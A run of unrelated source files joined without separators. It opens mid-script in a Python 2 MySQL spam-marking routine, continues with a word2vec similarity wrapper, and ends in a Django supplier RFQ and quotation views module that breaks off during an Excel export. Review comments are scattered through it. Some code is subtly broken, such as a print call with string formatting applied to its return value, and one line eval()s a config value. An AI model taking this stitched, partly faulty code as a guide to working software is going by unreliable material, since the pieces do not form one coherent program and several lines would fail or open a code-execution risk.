                print("[HAM] - marking member (%s,%s,%s,%s) as nom spammer.") % (item['Email'].encode('utf-8'), item['FirstName'].encode('utf-8'), item['Surname'].encode('utf-8'), item['ID'])
    else:
        print("nothing to process ... ")
    db.commit()
except Exception as e:
    print e
    # Rollback in case there is any error
    # NOTE(review): if MySQLdb.connect itself failed, `db` is unbound here and
    # db.rollback()/db.close() below raise NameError.
    db.rollback()
    raise
finally:
    if not (cursor is None):
        cursor.close()
    # disconnect from server
    if not (db is None):
        db.close()
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Author: zhangfang
# @Date: 2016-04-17 22:26:22
# @Email: thuzhf@gmail.com
# @Last Modified by: thuzhf
# @Last Modified time: 2016-04-18 00:44:28
from __future__ import print_function,division,unicode_literals,absolute_import
import sys,os,re,json,gzip,math,time,datetime,functools,itertools,random
import multiprocessing as mp
# Python 2/3 compatibility shim: alias the py3 names onto their py2
# equivalents so the rest of the module can use one spelling.
if sys.version_info < (3,): # version 2.x
    range2 = range
    range = xrange
    import ConfigParser as configparser
    import cPickle as pickle
else:
    import configparser
    import pickle
import requests
from gensim.models import Word2Vec
from history_analysis.utils.logger import simple_logger
logger = simple_logger(__name__, 'history_analysis/log/')
config = configparser.ConfigParser()
config_file = 'history_analysis/config/word2vec.cfg'
config.read(config_file)
section = config['service']
# SECURITY NOTE(review): eval() on a config value executes arbitrary code if
# the config file is tampered with — a plain string read (or ast.literal_eval)
# would be safer.
URL_PREFIX = eval(section['url_prefix'])
class Word2vecModel(object):
    """Thin wrapper around a gensim Word2Vec model with vocab filtering.

    Uses the pre-4.0 gensim API (`model.vocab`, `similarity`, `n_similarity`,
    `most_similar_cosmul`) — TODO confirm the installed gensim version.
    """
    def __init__(self, model_file):
        """Load a previously saved Word2Vec model from `model_file`."""
        logger.info('loading model: {}'.format(model_file))
        self.model = Word2Vec.load(model_file)
        logger.info('model loaded.')
    def filter_words(self, words):
        # Keep only tokens present in the model vocabulary.
        # NOTE(review): if `words` is a single string this iterates its
        # characters — get_similarity_between below passes single words, so
        # w1/w2 become lists of in-vocab characters; confirm this is intended.
        return [word for word in words if word in self.model.vocab]
    def get_similarity_between(self, w1, w2):
        """Similarity between two words, or None if either is out-of-vocab."""
        w1 = self.filter_words(w1)
        w2 = self.filter_words(w2)
        if w1 and w2:
            ans = self.model.similarity(w1, w2)
        else:
            ans = None
        return ans
    def get_n_similarity_between(self, ws1, ws2):
        """Similarity between two word *sets*, or None if either filters empty."""
        ws1 = self.filter_words(ws1)
        ws2 = self.filter_words(ws2)
        if ws1 and ws2:
            ans = self.model.n_similarity(ws1, ws2)
        else:
            ans = None
        return ans
    def most_similar(self, positive, negative=[], topn=10):
        """Top-n most similar words by multiplicative cosine (cosmul).

        NOTE(review): mutable default argument `negative=[]` — harmless here
        because it is never mutated, but a None default would be safer.
        """
        positive = self.filter_words(positive)
        negative = self.filter_words(negative)
        if positive or negative:
            ans = self.model.most_similar_cosmul(positive=positive, negative=negative, topn=topn)
        else:
            ans = None
        return ans
def get_similarity_between(mid1, mid2, url_prefix=URL_PREFIX):
    """Ask the word2vec HTTP service for the similarity of two words."""
    endpoint = '{:s}/similarity'.format(url_prefix)
    return requests.get(endpoint, {'w1': mid1, 'w2': mid2}).json()
def get_n_similarity_between(mid1, mid2, url_prefix=URL_PREFIX):
    """Ask the word2vec HTTP service for the similarity of two word sets."""
    endpoint = '{:s}/n_similarity'.format(url_prefix)
    return requests.get(endpoint, {'ws1': mid1, 'ws2': mid2}).json()
def main():
    """Smoke-test the similarity service with two example tokens."""
    n1 = 'data_mining'
    n2 = 'machine_learning'
    result = get_similarity_between(n1, n2)
    print(result)
if __name__ == '__main__':
    # Time the whole run and report wall-clock minutes elapsed.
    start_t = time.time()
    main()
    end_t = time.time()
    t = end_t - start_t
    print('Time elapsed: {:.4f} minutes'.format(t / 60.))
from django.shortcuts import render, redirect
from django.http import JsonResponse, HttpResponse
from .models import (RfqSupplierHeader,RfqSupplierDetail,
QuotationHeaderSupplier, QuotationDetailSupplier,
PoHeaderSupplier, PoDetailSupplier,
DcHeaderSupplier, DcDetailSupplier,
Company_info)
from customer.models import (DcHeaderCustomer, PoHeaderCustomer, QuotationHeaderCustomer, RfqCustomerHeader)
from inventory.models import Add_products
from transaction.models import ChartOfAccount,PurchaseDetail
from django.core import serializers
from django.forms.models import model_to_dict
import json
import datetime
from django.db import IntegrityError
from django.conf import settings
from django.views.generic import View
from .utils import render_to_pdf
from django.template.loader import get_template
from django.db import connection
from django.db.models import Q
import xlwt
from django.contrib.auth.decorators import user_passes_test, login_required
from django.contrib.auth.models import User
from user.models import UserRoles
from django.contrib import messages
from django.contrib.gis.geoip2 import GeoIP2
def _form_roles(user, form_id, form_name):
    """Return the UserRoles rows granting `user` access to a top-level form.

    Consolidates the five identical per-form queries that previously
    duplicated this filter.
    """
    return UserRoles.objects.filter(
        Q(user_id=user.id), Q(form_id=form_id), Q(form_name=form_name)
    ).all()


def customer_roles(user):
    """Roles for the Customer form (form_id=1)."""
    return _form_roles(user, 1, "Customer")


def supplier_roles(user):
    """Roles for the Supplier form (form_id=2)."""
    return _form_roles(user, 2, "Supplier")


def transaction_roles(user):
    """Roles for the Transaction form (form_id=3)."""
    return _form_roles(user, 3, "Transaction")


def inventory_roles(user):
    """Roles for the Inventory form (form_id=4)."""
    return _form_roles(user, 4, "Inventory")


def report_roles(user):
    """Roles for the Reports form (form_id=5)."""
    return _form_roles(user, 5, "Reports")
def _has_child_permission(user, child_form, flag):
    """True when `user` has a supplier-form (form_id=2) role row for
    `child_form` with the given permission `flag` set to 1.

    Replaces 21 near-identical functions that each built the same query; the
    original truthiness test on the queryset is expressed as .exists(), which
    returns the same boolean without fetching rows.
    """
    return UserRoles.objects.filter(
        Q(user_id=user.id), Q(form_id=2), Q(child_form=child_form), Q(**{flag: 1})
    ).exists()


# RFQ (child_form=21)
def allow_rfq_display(user):
    return _has_child_permission(user, 21, 'display')


def allow_rfq_add(user):
    return _has_child_permission(user, 21, 'add')


def allow_rfq_edit(user):
    return _has_child_permission(user, 21, 'edit')


def allow_rfq_delete(user):
    return _has_child_permission(user, 21, 'delete')


# Quotation (child_form=22)
def allow_quotation_display(user):
    return _has_child_permission(user, 22, 'display')


def allow_quotation_add(user):
    return _has_child_permission(user, 22, 'add')


def allow_quotation_edit(user):
    return _has_child_permission(user, 22, 'edit')


def allow_quotation_delete(user):
    return _has_child_permission(user, 22, 'delete')


def allow_quotation_print(user):
    return _has_child_permission(user, 22, 'r_print')


# Purchase order (child_form=23)
def allow_purchase_order_display(user):
    return _has_child_permission(user, 23, 'display')


def allow_purchase_order_add(user):
    return _has_child_permission(user, 23, 'add')


def allow_purchase_order_edit(user):
    return _has_child_permission(user, 23, 'edit')


def allow_purchase_order_delete(user):
    return _has_child_permission(user, 23, 'delete')


def allow_purchase_order_print(user):
    return _has_child_permission(user, 23, 'r_print')


# Delivery challan (child_form=24)
def allow_delivery_challan_display(user):
    return _has_child_permission(user, 24, 'display')


def allow_delivery_challan_add(user):
    return _has_child_permission(user, 24, 'add')


def allow_delivery_challan_edit(user):
    return _has_child_permission(user, 24, 'edit')


def allow_delivery_challan_delete(user):
    return _has_child_permission(user, 24, 'delete')


def allow_delivery_challan_print(user):
    return _has_child_permission(user, 24, 'r_print')


# MRN (child_form=25)
def allow_mrn_display(user):
    return _has_child_permission(user, 25, 'display')


def allow_mrn_edit(user):
    return _has_child_permission(user, 25, 'edit')
def _child_form_role(user, child_form):
    """Return the first UserRoles row for `user` on `child_form`, or None.

    Consolidates the five identical per-child-form queries; user_id is
    stringified exactly as the originals did.
    """
    return UserRoles.objects.filter(
        Q(user_id=str(user.id)), Q(child_form=child_form)
    ).first()


def rfq_roles(user):
    """RFQ (child_form=21) role row for `user`."""
    return _child_form_role(user, 21)


def quotation_roles2(user):
    """Quotation (child_form=22) role row for `user`."""
    return _child_form_role(user, 22)


def purchase_order_roles(user):
    """Purchase order (child_form=23) role row for `user`."""
    return _child_form_role(user, 23)


def delivery_challan_roles(user):
    """Delivery challan (child_form=24) role row for `user`."""
    return _child_form_role(user, 24)


def mrn_roles(user):
    """MRN (child_form=25) role row for `user`."""
    return _child_form_role(user, 25)
def get_client_ip(request):
    """Best-effort client IP: first hop of X-Forwarded-For, else REMOTE_ADDR."""
    forwarded = request.META.get('HTTP_X_FORWARDED_FOR')
    if forwarded:
        return forwarded.split(',')[0]
    return request.META.get('REMOTE_ADDR')
@login_required
def home(request):
    """Dashboard view: renders the base template with follow-up notifications
    due today for both customer and supplier documents, plus the user's
    module-level role sets.
    """
    allow_customer_roles = customer_roles(request.user)
    allow_supplier_roles = supplier_roles(request.user)
    allow_transaction_roles = transaction_roles(request.user)
    allow_inventory_roles = inventory_roles(request.user)
    today = datetime.date.today()
    cursor = connection.cursor()
    # Customer documents (RFQ/quotation/PO/DC) flagged for follow-up today.
    cursor.execute('''select rfq_no , date, account_id_id
    from customer_rfqcustomerheader
    where customer_rfqcustomerheader.show_notification = 1 and customer_rfqcustomerheader.follow_up = %s
    union
    select quotation_no, date, account_id_id
    from customer_quotationheadercustomer
    where customer_quotationheadercustomer.show_notification = 1 and customer_quotationheadercustomer.follow_up = %s
    union
    select po_no, date, account_id_id
    from customer_poheadercustomer
    where customer_poheadercustomer.show_notification = 1 and customer_poheadercustomer.follow_up = %s
    union
    select dc_no, date, account_id_id
    from customer_dcheadercustomer
    where customer_dcheadercustomer.show_notification = 1 and customer_dcheadercustomer.follow_up = %s
    ''',[today,today,today,today])
    customer_row = cursor.fetchall()
    total_notification = len(customer_row)
    # Supplier documents flagged for follow-up today.
    # FIX: the original did `supplier_row = cursor.execute(...)` and then
    # called supplier_row.fetchall() — cursor.execute() does not return a
    # cursor (MySQLdb returns a row count), so that line raised
    # AttributeError.  Fetch from the cursor itself instead.
    cursor.execute('''select rfq_no , date, account_id_id
    from supplier_rfqsupplierheader
    where supplier_rfqsupplierheader.show_notification = 1 and supplier_rfqsupplierheader.follow_up = %s
    union
    select quotation_no, date, account_id_id
    from supplier_quotationheadersupplier
    where supplier_quotationheadersupplier.show_notification = 1 and supplier_quotationheadersupplier.follow_up = %s
    union
    select po_no, date, account_id_id
    from supplier_poheadersupplier
    where supplier_poheadersupplier.show_notification = 1 and supplier_poheadersupplier.follow_up = %s
    union
    select dc_no, date, account_id_id
    from supplier_dcheadersupplier
    where supplier_dcheadersupplier.show_notification = 1 and supplier_dcheadersupplier.follow_up = %s
    ''',[today,today,today,today])
    supplier_row = cursor.fetchall()
    total_notification_supplier = len(supplier_row)
    return render(request,'supplier/base.html',{'total_notification':total_notification,'total_notification_supplier':total_notification_supplier ,'customer_row':customer_row, 'supplier_row':supplier_row, 'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles,
    'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
@user_passes_test(allow_rfq_display)
def rfq_supplier(request):
    """List all supplier RFQs with the current user's permission flags."""
    company = request.session['company']
    company = Company_info.objects.get(id = company)
    company = Q(company_id = company)
    # NOTE(review): the `company` Q object is built but never applied —
    # RfqSupplierHeader.objects.all() below ignores the session company.
    # Confirm whether the RFQ list should be filtered per company.
    allow_customer_roles = customer_roles(request.user)
    allow_supplier_roles = supplier_roles(request.user)
    allow_transaction_roles = transaction_roles(request.user)
    allow_inventory_roles = inventory_roles(request.user)
    permission = rfq_roles(request.user)
    all_rfq = RfqSupplierHeader.objects.all()
    return render(request, 'supplier/rfq_supplier.html',{'all_rfq':all_rfq, 'permission':permission,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles,'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
@user_passes_test(allow_rfq_add)
def new_rfq_supplier(request):
    """Create a supplier RFQ.

    Multiplexed endpoint: a POST carrying `item_code` is an AJAX product
    lookup returning serialized product rows; any other POST saves a new RFQ
    header plus its detail lines; a GET renders the entry form.
    """
    company = request.session['company']
    company = Company_info.objects.get(id = company)
    allow_customer_roles = customer_roles(request.user)
    allow_supplier_roles = supplier_roles(request.user)
    allow_transaction_roles = transaction_roles(request.user)
    allow_inventory_roles = inventory_roles(request.user)
    get_last_rfq_no = RfqSupplierHeader.objects.last()
    all_item_code = Add_products.objects.all()
    # Build the next RFQ number from the last 3 digits of the latest one.
    # NOTE(review): slicing [-3:] caps the numeric part at 3 digits — confirm
    # behaviour once numbers reach RFQ/SP/1000.
    if get_last_rfq_no:
        get_last_rfq_no = get_last_rfq_no.rfq_no
        get_last_rfq_no = get_last_rfq_no[-3:]
        num = int(get_last_rfq_no)
        num = num + 1
        get_last_rfq_no = 'RFQ/SP/' + str(num)
    else:
        get_last_rfq_no = 'RFQ/SP/101'
    # Accounts under the customer (100) and supplier (200) roots.
    customer = Q(account_id = '100')
    supplier = Q(account_id = '200')
    all_accounts = ChartOfAccount.objects.filter(customer|supplier).all()
    # AJAX branch: look up a product by code and return it as JSON.
    item_code = request.POST.get('item_code',False)
    if item_code:
        data = Add_products.objects.filter(product_code = item_code)
        for value in data:
            print(value.product_code)
        row = serializers.serialize('json',data)
        return HttpResponse(json.dumps({'row':row}))
    if request.method == 'POST':
        # Save branch: create the RFQ header and one detail row per item.
        supplier = request.POST.get('supplier',False)
        attn = request.POST.get('attn',False)
        follow_up = request.POST.get('follow_up',False)
        footer_remarks = request.POST.get('footer_remarks',False)
        items = json.loads(request.POST.get('items'))
        try:
            account_id = ChartOfAccount.objects.get(account_title = supplier)
        except ChartOfAccount.DoesNotExist:
            return JsonResponse({"result":"No Account Found "+supplier+""})
        # Missing follow-up dates fall back to a sentinel date.
        if follow_up:
            follow_up = follow_up
        else:
            follow_up = '2010-10-06'
        date = datetime.date.today()
        rfq_header = RfqSupplierHeader(rfq_no = get_last_rfq_no, date = date , attn = attn, follow_up = follow_up, footer_remarks = footer_remarks ,account_id = account_id, company_id = company, user_id = request.user)
        rfq_header.save()
        header_id = RfqSupplierHeader.objects.get(rfq_no=get_last_rfq_no)
        for value in items:
            id = value["id"]
            id = Add_products.objects.get(id = id)
            rfq_detail = RfqSupplierDetail(item_id = id, quantity = value["quantity"], unit = value["unit"], rfq_id = header_id)
            rfq_detail.save()
        return JsonResponse({"result": "success"})
    return render(request,'supplier/new_rfq_supplier.html',{'get_last_rfq_no':get_last_rfq_no, 'all_item_code':all_item_code, 'all_accounts':all_accounts,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
@user_passes_test(allow_rfq_edit)
def edit_rfq_supplier(request,pk):
    """Edit an existing supplier RFQ (header plus its detail lines).

    GET renders the edit form. An AJAX POST carrying 'item_code' returns the
    matching product serialized as JSON (or a message when the item is
    already on this RFQ). A full POST deletes every existing detail row and
    re-creates them from the submitted 'items' JSON payload, after updating
    the header fields.
    """
    company = request.session['company']
    company = Company_info.objects.get(id = company)
    company = Q(company_id = company)  # used to scope the header lookup below
    allow_customer_roles = customer_roles(request.user)
    allow_supplier_roles = supplier_roles(request.user)
    allow_transaction_roles = transaction_roles(request.user)
    allow_inventory_roles = inventory_roles(request.user)
    rfq_header = RfqSupplierHeader.objects.filter(company,id = pk).first()
    rfq_detail = RfqSupplierDetail.objects.filter(rfq_id = rfq_header.id).all()
    all_item_code = list(Add_products.objects.values('product_code'))
    # Accounts with ids 100 (customer) or 200 (supplier) feed the dropdown.
    customer = Q(account_id = '100')
    supplier = Q(account_id = '200')
    all_accounts = ChartOfAccount.objects.filter(customer|supplier).all()
    try:
        # AJAX item lookup: return the product row, or refuse duplicates.
        item_code = request.POST.get('item_code',False)
        if item_code:
            item_id = Add_products.objects.get(product_code = item_code)
            item_code_exist = RfqSupplierDetail.objects.filter(item_id = item_id, rfq_id = rfq_header.id).first()
            data = Add_products.objects.filter(id = item_id.id)
            if item_code_exist:
                return HttpResponse(json.dumps({'message':"Item Already Exist"}))
            row = serializers.serialize('json',data)
            return HttpResponse(json.dumps({'row':row}))
        if request.method == 'POST':
            # Full save: drop the current detail rows; they are rewritten
            # from the submitted items below.
            rfq_detail.delete()
            edit_rfq_supplier_name = request.POST.get('edit_rfq_supplier_name',False)
            edit_rfq_attn = request.POST.get('edit_rfq_attn',False)
            edit_rfq_follow_up = request.POST.get('edit_rfq_follow_up',False)
            edit_footer_remarks = request.POST.get('edit_footer_remarks',False)
            try:
                account_id = ChartOfAccount.objects.get(account_title = edit_rfq_supplier_name)
            except ChartOfAccount.DoesNotExist:
                return JsonResponse({"result":"No Account Found "+edit_rfq_supplier_name+""})
            if edit_rfq_follow_up:
                edit_rfq_follow_up = edit_rfq_follow_up
            else:
                # Sentinel date stored when no follow-up date was supplied.
                edit_rfq_follow_up = '2010-10-06'
            rfq_header.attn = edit_rfq_attn
            rfq_header.follow_up = edit_rfq_follow_up
            rfq_header.account_id = account_id
            rfq_header.footer_remarks = edit_footer_remarks
            rfq_header.save()
            header_id = RfqSupplierHeader.objects.get(id = pk)
            items = json.loads(request.POST.get('items'))
            for value in items:
                id = value["id"]
                id = Add_products.objects.get(id = id)
                rfq_detail = RfqSupplierDetail(item_id = id, quantity = value["quantity"], unit = value["unit"], rfq_id = header_id)
                rfq_detail.save()
            return JsonResponse({"result":"success"})
    except IntegrityError:
        # Duplicate detail insert: swallow and fall through to re-render.
        print("Data Already Exist")
    return render(request,'supplier/edit_rfq_supplier.html',{'rfq_header':rfq_header,'pk':pk,'rfq_detail':rfq_detail, 'all_item_code':all_item_code, 'all_accounts':all_accounts,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
@user_passes_test(allow_rfq_delete)
def delete_rfq_supplier(request,pk):
    """Delete a supplier RFQ header and all of its detail rows.

    Detail rows are removed first so no orphaned RfqSupplierDetail rows are
    left referencing a deleted header; then redirect to the RFQ list.
    """
    # Fix: added @login_required for consistency with the sibling delete
    # views (delete_quotation_supplier, delete_purchase_order_supplier,
    # delete_delivery_challan_supplier), all of which require a logged-in
    # session before the role check runs.
    RfqSupplierDetail.objects.filter(rfq_id_id = pk).all().delete()
    RfqSupplierHeader.objects.filter(id = pk).delete()
    messages.add_message(request, messages.SUCCESS, "Supplier RFQ Deleted")
    return redirect('rfq-supplier')
@login_required
@user_passes_test(allow_quotation_display)
def quotation_supplier(request):
    """Render the supplier quotation overview page."""
    session_company = request.session['company']
    company = Q(company_id = Company_info.objects.get(id = session_company))
    # NOTE(review): `company` is built but never applied to the queryset
    # below — confirm whether this list should be company-scoped.
    context = {
        'all_quotation': QuotationHeaderSupplier.objects.all(),
        'permission': quotation_roles2(request.user),
        'allow_customer_roles': customer_roles(request.user),
        'allow_supplier_roles': supplier_roles(request.user),
        'allow_transaction_roles': transaction_roles(request.user),
        'allow_inventory_roles': inventory_roles(request.user),
        'allow_report_roles': report_roles(request.user),
        'is_superuser': request.user.is_superuser,
    }
    return render(request, 'supplier/quotation_supplier.html', context)
@login_required
@user_passes_test(allow_quotation_add)
def new_quotation_supplier(request):
    """Create a new supplier quotation.

    GET renders the entry form with the next quotation number pre-computed.
    An AJAX POST carrying 'item_code_quotation' returns the matching product
    serialized as JSON. A full POST creates the QuotationHeaderSupplier row
    and one QuotationDetailSupplier row per item in the 'items' JSON payload.
    """
    company = request.session['company']
    company = Company_info.objects.get(id = company)
    allow_customer_roles = customer_roles(request.user)
    allow_supplier_roles = supplier_roles(request.user)
    allow_transaction_roles = transaction_roles(request.user)
    allow_inventory_roles = inventory_roles(request.user)
    get_last_quotation_no = QuotationHeaderSupplier.objects.last()
    all_item_code = Add_products.objects.all()
    # Accounts with ids 100 (customer) or 200 (supplier) feed the dropdown.
    customer = Q(account_id = '100')
    supplier = Q(account_id = '200')
    all_accounts = ChartOfAccount.objects.filter(customer|supplier).all()
    if get_last_quotation_no:
        # Next number = last three characters of the latest quotation_no + 1.
        # NOTE(review): assumes the numeric suffix is always three digits.
        get_last_quotation_no = get_last_quotation_no.quotation_no
        get_last_quotation_no = get_last_quotation_no[-3:]
        num = int(get_last_quotation_no)
        num = num + 1
        get_last_quotation_no = 'QU/SP/' + str(num)
    else:
        # First quotation ever: start the sequence at 101.
        get_last_quotation_no = 'QU/SP/101'
    # AJAX product lookup for the item-code autocomplete.
    item_code_quotation = request.POST.get('item_code_quotation',False)
    if item_code_quotation:
        data = Add_products.objects.filter(product_code = item_code_quotation)
        row = serializers.serialize('json',data)
        print(row)
        return HttpResponse(json.dumps({'row':row}))
    if request.method == 'POST':
        supplier = request.POST.get('supplier',False)
        attn = request.POST.get('attn',False)
        prcbasis = request.POST.get('prcbasis',False)
        leadtime = request.POST.get('leadtime',False)
        validity = request.POST.get('validity',False)
        payment = request.POST.get('payment',False)
        remarks = request.POST.get('remarks',False)
        currency = request.POST.get('currency',False)
        exchange_rate = request.POST.get('exchange_rate',False)
        follow_up = request.POST.get('follow_up',False)
        footer_remarks = request.POST.get('footer_remarks',False)
        if follow_up:
            follow_up = follow_up
        else:
            # Sentinel date stored when no follow-up date was supplied.
            follow_up = '2010-10-06'
        try:
            account_id = ChartOfAccount.objects.get(account_title = supplier)
        except ChartOfAccount.DoesNotExist:
            return JsonResponse({"result":"No Account Found "+supplier+""})
        date = datetime.date.today()
        quotation_header = QuotationHeaderSupplier(quotation_no = get_last_quotation_no, date = date, attn = attn, prc_basis = prcbasis,
        leadtime = leadtime, validity = validity, payment = payment, remarks = remarks, currency = currency,
        exchange_rate = exchange_rate, follow_up = follow_up, show_notification = True, footer_remarks = footer_remarks, account_id = account_id, company_id = company, user_id = request.user)
        quotation_header.save()
        items = json.loads(request.POST.get('items'))
        # Re-fetch the header so the detail rows get a saved FK target.
        header_id = QuotationHeaderSupplier.objects.get(quotation_no = get_last_quotation_no)
        for value in items:
            id = value["id"]
            id = Add_products.objects.get(id = id)
            quotation_detail = QuotationDetailSupplier(item_id = id, quantity = value["quantity"], unit = value["unit"], unit_price = value["unit_price"], remarks = value["remarks"], quotation_id = header_id)
            quotation_detail.save()
        return JsonResponse({'result':'success'})
    return render(request, 'supplier/new_quotation_supplier.html',{'all_item_code':all_item_code,'get_last_quotation_no':get_last_quotation_no,'all_accounts':all_accounts,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
@user_passes_test(allow_quotation_edit)
def edit_quotation_supplier(request,pk):
    """Edit an existing supplier quotation (header plus detail lines).

    GET renders the edit form. An AJAX POST carrying 'item_code' returns the
    matching product serialized as JSON (or a message when the item already
    appears on this quotation). A full POST deletes every existing detail row
    and re-creates them from the submitted 'items' JSON payload, after
    updating the header fields.
    """
    company = request.session['company']
    company = Company_info.objects.get(id = company)
    company = Q(company_id = company)  # used to scope the header lookup below
    allow_customer_roles = customer_roles(request.user)
    allow_supplier_roles = supplier_roles(request.user)
    allow_transaction_roles = transaction_roles(request.user)
    allow_inventory_roles = inventory_roles(request.user)
    quotation_header = QuotationHeaderSupplier.objects.filter(company, id = pk).first()
    quotation_detail = QuotationDetailSupplier.objects.filter(quotation_id = quotation_header.id).all()
    all_accounts = ChartOfAccount.objects.all()
    print(quotation_detail)
    all_item_code = list(Add_products.objects.values('product_code'))
    # AJAX item lookup: return the product row, or refuse duplicates.
    item_code = request.POST.get('item_code',False)
    if item_code:
        item_id = Add_products.objects.get(product_code = item_code)
        item_code_exist = QuotationDetailSupplier.objects.filter(item_id = item_id, quotation_id = quotation_header.id).first()
        data = Add_products.objects.filter(id = item_id.id)
        if item_code_exist:
            return HttpResponse(json.dumps({'message':"Item Already Exist"}))
        row = serializers.serialize('json',data)
        return HttpResponse(json.dumps({'row':row}))
    if request.method == 'POST':
        # Full save: drop the current detail rows; they are rewritten from
        # the submitted items below.
        quotation_detail.delete()
        edit_supplier = request.POST.get('supplier',False)
        edit_quotation_attn = request.POST.get('attn',False)
        edit_quotation_prcbasis = request.POST.get('prcbasis',False)
        edit_quotation_leadtime = request.POST.get('leadtime',False)
        edit_quotation_validity = request.POST.get('validity',False)
        edit_quotation_payment = request.POST.get('payment',False)
        edit_quotation_remarks = request.POST.get('remarks',False)
        edit_quotation_currency_rate = request.POST.get('currency',False)
        edit_quotation_exchange_rate = request.POST.get('exchange_rate',False)
        edit_quotation_follow_up = request.POST.get('follow_up',False)
        edit_footer_remarks = request.POST.get('edit_footer_remarks',False)
        try:
            account_id = ChartOfAccount.objects.get(account_title = edit_supplier)
        except ChartOfAccount.DoesNotExist:
            return JsonResponse({"result":"No Account Found "+edit_supplier+""})
        quotation_header.attn = edit_quotation_attn
        quotation_header.prc_basis = edit_quotation_prcbasis
        quotation_header.leadtime = edit_quotation_leadtime
        quotation_header.validity = edit_quotation_validity
        quotation_header.payment = edit_quotation_payment
        quotation_header.remarks = edit_quotation_remarks
        quotation_header.currency = edit_quotation_currency_rate
        quotation_header.exchange_rate = edit_quotation_exchange_rate
        quotation_header.account_id = account_id
        quotation_header.follow_up = edit_quotation_follow_up
        quotation_header.footer_remarks = edit_footer_remarks
        quotation_header.save()
        header_id = QuotationHeaderSupplier.objects.get(id = pk)
        items = json.loads(request.POST.get('items'))
        print(items)
        for value in items:
            id = value["id"]
            id = Add_products.objects.get(id = id)
            quotation_detail = QuotationDetailSupplier(item_id = id, quantity = value["quantity"], unit = value["unit"], unit_price = value["unit_price"], remarks = value["remarks"], quotation_id = header_id)
            quotation_detail.save()
        return JsonResponse({"result":"success"})
    return render(request,'supplier/edit_quotation_supplier.html',{'quotation_header':quotation_header,'pk':pk,'quotation_detail':quotation_detail, 'all_item_code':all_item_code, 'all_accounts':all_accounts,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
@user_passes_test(allow_quotation_print)
def print_quotation_supplier(request,pk):
    """Render a supplier quotation as an inline PDF response.

    Totals unit_price * quantity over the detail rows, applies the header's
    exchange rate, and passes everything to the PDF template. Returns the
    PDF inline, or a plain "Not found" response when rendering fails.
    """
    company = request.session['company']
    allow_customer_roles = customer_roles(request.user)
    allow_supplier_roles = supplier_roles(request.user)
    allow_transaction_roles = transaction_roles(request.user)
    allow_inventory_roles = inventory_roles(request.user)
    total_amount = 0
    company_info = Company_info.objects.filter(id = company).all()
    company = request.session['company']
    company = Company_info.objects.get(id = company)
    company = Q(company_id = company)  # scope the header lookup to this company
    header = QuotationHeaderSupplier.objects.filter(company,id = pk).first()
    detail = QuotationDetailSupplier.objects.filter(quotation_id = header.id).all()
    for value in detail:
        amount = float(value.unit_price * value.quantity)
        total_amount = total_amount + amount
    total_amount = total_amount * float(header.exchange_rate)
    pdf = render_to_pdf('supplier/quotation_supplier_pdf.html', {'company_info':company_info,'header':header, 'detail':detail,'total_amount':total_amount,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
    if pdf:
        response = HttpResponse(pdf, content_type='application/pdf')
        # Fix: use the real quotation number in the download filename instead
        # of the hard-coded placeholder "123" (matches print_po_supplier).
        filename = "Quotation_Supplier_%s.pdf" %(header.quotation_no)
        content = "inline; filename='%s'" %(filename)
        response['Content-Disposition'] = content
        return response
    return HttpResponse("Not found")
@login_required
@user_passes_test(allow_quotation_delete)
def delete_quotation_supplier(request,pk):
    """Delete one supplier quotation: detail rows first, then the header."""
    detail_rows = QuotationDetailSupplier.objects.filter(quotation_id_id = pk).all()
    detail_rows.delete()
    QuotationHeaderSupplier.objects.filter(id = pk).delete()
    messages.add_message(request, messages.SUCCESS, "Supplier Quotation Deleted")
    return redirect('quotation-supplier')
@login_required
def quotation_export_supplier(request):
    """Export every supplier quotation header to an Excel (.xls) download.

    Builds a one-sheet workbook: a bold header row with the column titles,
    then one row per QuotationHeaderSupplier record.
    """
    allow_customer_roles = customer_roles(request.user)
    allow_supplier_roles = supplier_roles(request.user)
    allow_transaction_roles = transaction_roles(request.user)
    allow_inventory_roles = inventory_roles(request.user)
    response = HttpResponse(content_type='application/ms-excel')
    response['Content-Disposition'] = 'attachment; filename="QuotationSupplier.xls"'
    wb = xlwt.Workbook(encoding='utf-8')
    ws = wb.add_sheet('Users')
    # Sheet header, first row (bold).
    row_num = 0
    font_style = xlwt.XFStyle()
    font_style.font.bold = True
    # Fix: corrected the 'Curreny' typo in the exported column title.
    columns = ['Quotation No', 'Date','Attn' ,'Prc Basis', 'Lead Time', 'Validity', 'Payment', 'Remarks', 'Currency', 'Exchange Rate', 'Follow Up', 'Footer Remarks']
    for col_num in range(len(columns)):
        ws.write(row_num, col_num, columns[col_num], font_style)
    # Sheet body, remaining rows (plain style).
    font_style = xlwt.XFStyle()
    rows = QuotationHeaderSupplier.objects.all().values_list('quotation_no', 'date', 'attn', 'prc_basis', 'leadtime', 'validity', 'payment', 'remarks', 'currency', 'exchange_rate', 'follow_up', 'footer_remarks')
    for row in rows:
        row_num += 1
        for col_num in range(len(row)):
